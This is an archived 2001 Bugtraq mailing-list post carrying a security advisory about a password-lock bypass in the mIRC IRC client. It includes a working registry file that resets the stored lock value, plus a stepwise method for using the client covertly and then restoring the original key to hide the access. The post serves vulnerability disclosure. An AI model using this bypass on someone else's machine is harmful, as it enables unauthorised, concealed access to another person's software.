[18832] in bugtraq
mIRC allows password protection to be bypassed
daemon@ATHENA.MIT.EDU (scalar)
Fri Jan 26 13:26:46 2001
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_000E_01C086F5.45D0DF80"
X-Apparently-From: JulieRogles@aol.com
Message-ID: <001201c08727$91904780$fdd40f04@pavilion>
Date: Thu, 25 Jan 2001 17:35:56 -0600
Reply-To: scalar <scalar@SHADOWVX.COM>
From: scalar <scalar@SHADOWVX.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
This is a multi-part message in MIME format.
------=_NextPart_000_000E_01C086F5.45D0DF80
Content-Type: multipart/alternative;
boundary="----=_NextPart_001_000F_01C086F5.45D0DF80"
------=_NextPart_001_000F_01C086F5.45D0DF80
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Hello,
I have found a hole in mIRC (a popular IRC client for the Windows =
platform) that allows a malicious user to subvert the optional password =
on the mIRC.exe binary. Full details are in the attached advisory. The =
advisory is also available at =
http://chronix.shadowvx.com/advisories/scalar-01-02.txt
thanks,
scalar
------=_NextPart_001_000F_01C086F5.45D0DF80
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META content=3D"text/html; charset=3Diso-8859-1" =
http-equiv=3DContent-Type>
<META content=3D"MSHTML 5.00.2722.2800" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#ffffff>
<DIV><FONT color=3D#000000 face=3DArial size=3D2>Hello,</FONT></DIV>
<DIV><FONT color=3D#000000 face=3DArial =
size=3D2> I have found=20
a hole in mIRC (a popular IRC client for the Windows platform) that =
allows a=20
malicious user to subvert the optional password on the mIRC.exe binary. =
Full=20
details are in the attached advisory. The advisory is also available at =
<A=20
href=3D"http://chronix.shadowvx.com/advisories/scalar-01-02.txt">http://c=
hronix.shadowvx.com/advisories/scalar-01-02.txt</A></FONT></DIV>
<DIV> </DIV>
<DIV><FONT color=3D#000000 face=3DArial size=3D2>thanks,</FONT></DIV>
<DIV> </DIV>
<DIV><FONT color=3D#000000 face=3DArial =
size=3D2>scalar</FONT></DIV></BODY></HTML>
------=_NextPart_001_000F_01C086F5.45D0DF80--
------=_NextPart_000_000E_01C086F5.45D0DF80
Content-Type: text/plain;
name="scalar-01-02.txt"
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment;
filename="scalar-01-02.txt"
Scalar Security Research Labs
===================================
Presents
--------------------------[ Advisory 01-02 ]--------------------------
Advisory ID : 01-02
Synopsis : mIRC password protection can be bypassed
Application : mIRC version 5.7; other versions may be
affected
Vendor : Not yet notified
Web Contact : www.mirc.com
Exploit : Execution of mIRC without knowledge of the
password
Author : scalar
E-mail : scalar@shadowvx.com
Homepage : chronix.shadowvx.com
---| Table of Contents
---| The Problem
---| Exploit Details
---| Patches/Workarounds
---| Disclaimer
---| Feedback
---| The Problem:
IRC is a protocol designed to allow a means of communications
across the Internet in real-time. This is a widely used channel, with
connection establishment to IRC servers requiring software known as
IRC clients. On the Windows operating system, one of the most widely
used clients is: mIRC. This client is not totally secure, and has
a somewhat significant vulnerability that allows a malicious user
to bypass the mIRC password. Specifically, version 5.71 is analyzed
within this advisory.
In mIRC, there is an option to "Lock" mIRC. This option sets the
requirement of a password to be entered before the program fully
executes, and becomes functional. This options is located within the
Options dialog window. Within the left hand panel, [+] General should
be visible. The next step requires to click the [+] to drop-down the
list of available options for the General subset. Now, the following
should be clearly seen:
[-]-General
|-Server
|-Lock
Next step requires the "Lock" option to be chosen. This changes the
right-hand side of the window, making available Lock options.
On the upper right-hand side, is the button: Lock. Clicking
this button opens a dialog box that requests a new password to lock
mIRC. After entering the necessary data, "OK" should be clicked. This
sets the password, and effectively locks the mIRC binary. Each
proceeding execution of the program will require a password.
This option seems to effectively secure the IRC client, however,
I have found a way to easily subvert the password, and thus gain full
control of mIRC without ever even entering a password.
The password mIRC uses to "lock" mIRC is kept within the
registry. To be exact, it is within the following key:
HKEY_CURRENT_USER\Software\mIRC\LockOptions
If no password is set, the value will be: 0,1. However, if a password
is set, which is presumably the case, a similar value to the following
will be the contained value: 3351915520,1. This value is actually for
the password: abcdefg. As of yet, I do not kow the algorithm used to
encrypt the password. An interesting detail about the value contained
within the key is that no matter the length of the password, it is
always stored as ten numeric characters, followed by ",1." Although,
the value may not actually be the encrypted password, it is simply my
assumption.
As stated previously, when mIRC is set with no password, the
value contained within the key is: 0,1. Thus, if there is a password,
and it was to be set to: 0,1 , then it would consequently allow mIRC
to execute without the requirement of a password.
---| Exploit Details:
This easily accomplished vulnerability can be exploited by the
following registry file, which should have the file extension: reg
(i.e., mIRC_sploit.reg). Once the creation of the following exploit is
created, the icon of the file should be double-clicked within Windows
Explorer, and all subsequent messages should be agreed to.
---BEGIN CUT HERE------------------------------------------------------
REGEDIT4
[HKEY_CURRENT_USER\Software\mIRC\LockOptions]
"(Default)"="0,1"
---END CUT HERE--------------------------------------------------------
However, a more clever attacker will:
1. Rename the original "(Default)" key.
2. Use mIRC_sploit.reg to create a new "(Default)" key.
3. Use mIRC without entering a password.
4. Finish using mIRC.
5. Delete the newest "(Default)" key.
6. Rename the old key's name back to "(Default)".
This method keeps the password, whilst still allowing a malicious user
access to the program.
---| Patches/Workarounds:
No patches or workarounds are known at this time.
---| Disclaimer:
The information contained in this advisory is the copyright of
Scalar Security Research Labs. The data is believed to be accurate
at the time of release, but no representation or warranty is given,
express or implied, as to its accuracy or completeness. Neither
the author nor the publisher accepts any liability whatsoever for
any direct, indirect or conquential loss or damage arising in any
way from any use of, or reliance placed on, this information for
any purpose. This advisory may be redistributed provided that no
fee is assigned and that the content is not modified in any way.
---| Feedback:
Please send suggestions, updates, and comments to:
Scalar Security Research Labs
E-mail : scalar@shadowvx.com
Homepage : chronix.shadowvx.com
______________________________________________________________________
Copyright 2001.
Scalar Security Research Labs.
All rights reserved.
------=_NextPart_000_000E_01C086F5.45D0DF80--
